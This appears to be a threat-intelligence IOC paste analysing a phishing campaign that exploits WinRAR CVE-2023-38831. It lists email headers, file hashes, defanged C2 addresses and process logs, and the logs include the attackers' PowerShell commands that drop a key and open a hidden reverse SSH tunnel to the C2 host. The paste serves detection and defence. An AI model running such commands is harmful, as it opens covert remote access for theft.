#rar_explot_110923

1. #IOC #OptiData #VR #RAR #202338831 #SSH #CMD #Powershell
2.  
3. https://pastebin.com/2FvjfiEs
4.  
5. previous_contact:
6. https://pastebin.com/APaRNDHd
7.  
8. FAQ:
9. https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
10.  
11.  
12. attack_vector
13. --------------
14. email attach .RAR (exploit) > .pdf .cmd > powershell > ssh > exfil
15.  
16.  
17. # # # # # # # #
18. email_headers
19. # # # # # # # #
20. Received: from 185_ .158_ .164_ .73
21. Received: from 185_ .195_ .19_ .196
22. From: jie_ .lin_ .wang_ @feber_ -co_ .com
23. Date: Mon, 11 Sep 2023 10:02:53 +0300
24. Subject: Updated: Нові індикатори кіберзагроз
25.  
26.  
27. # # # # # # # #
28. files
29. # # # # # # # #
30. SHA-256 072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7
31. File name IOC_09_11.rar [ WinRAR CVE-2023-38831 ]
32. File size 234.38 KB (240000 bytes)
33.  
34. SHA-256 91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a
35. File name IOC_09_11.pdf .cmd
36. File size 6.74 KB (6901 bytes)
37.  
38. SHA-256 b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6
39. File name IOC_09_11.pdf
40. File size 261.03 KB (267296 bytes)
41.  
42.  
43. # # # # # # # #
44. activity
45. # # # # # # # #
46.  
47. PL_SCR email_attach
48.  
49. C2 46.4.105{ .116
50. 216.66.35{ .145
51.  
52.  
53. netwrk
54. --------------
55. 216.66.35{ .145 443 TCP 49301 → 443 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1
56.  
57. 46.4.105{ .116 webhook{ .site 80 HTTP POST /e2831741-d8c8-4971-9464-e52d34f9d611 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
58.  
59.  
60. comp
61. --------------
62. ssh.exe 1316 TCP 216.66.35{ .145 443 ESTABLISHED
63.  
64.  
65. proc
66. --------------
67. C:\Program Files\WinRAR\WinRAR.exe
68. C:\Windows\system32\cmd.exe /c ""C:\Users\support\AppData\Local\Temp\Rar$DIa3472.25027\IOC_09_11.pdf .cmd" "
69. C:\Program Files\WinRAR\WinRAR.exe e -ibck "IOC_09_11.rar" *.* C:\Users\support\AppData\Local\Temp\
70.  
71. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "Set-Content -Path \"$($env:LOCALAPPDATA)\\Temp\\rsakey\" -Value \"-----BEGIN RSA ....
72.  
73. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$port=get-random -Minimum 10760 -Maximum 11290;start-process ssh.exe -windowstyle Hidden -ArgumentList \"-N -p443 root@216.66.35{ .145 -R 216.66.35P{ .145:$port -i $($env:LOCALAPPDATA)\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no\" -PassThru"
74.  
75. C:\Program Files (x86)\OpenSSH\ssh.exe -N -p443 root@216.66.35{ .145 -R 216.66.35{ .145:11146 -i C:\Users\support\AppData\Local\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no
76. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand ...
77.  
78. C:\Windows\system32\timeout.exe 3
79.  
80.  
81. persist
82. --------------
83. n/a
84.  
85.  
86. drop
87. --------------
88. %temp%\Rar$DIa3472.25027\IOC_09_11.pdf
89. %temp%\Rar$DIa3472.25027\IOC_09_11.pdf .cmd
90. C:\Users\support\.ssh\known_hosts
91. %temp%\rsakey
92.  
93.  
94. # # # # # # # #
95. additional info
96. # # # # # # # #
97.  
98.  
99. # # # # # # # #
100. VT & Intezer
101. # # # # # # # #
102. https://www.virustotal.com/gui/file/072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7/details
103. https://www.virustotal.com/gui/file/91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a/details
104. https://analyze.intezer.com/analyses/f32a47c7-333b-4b4e-9b69-14ea0378c083
105. https://www.virustotal.com/gui/file/b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6/details
106.  
107. VR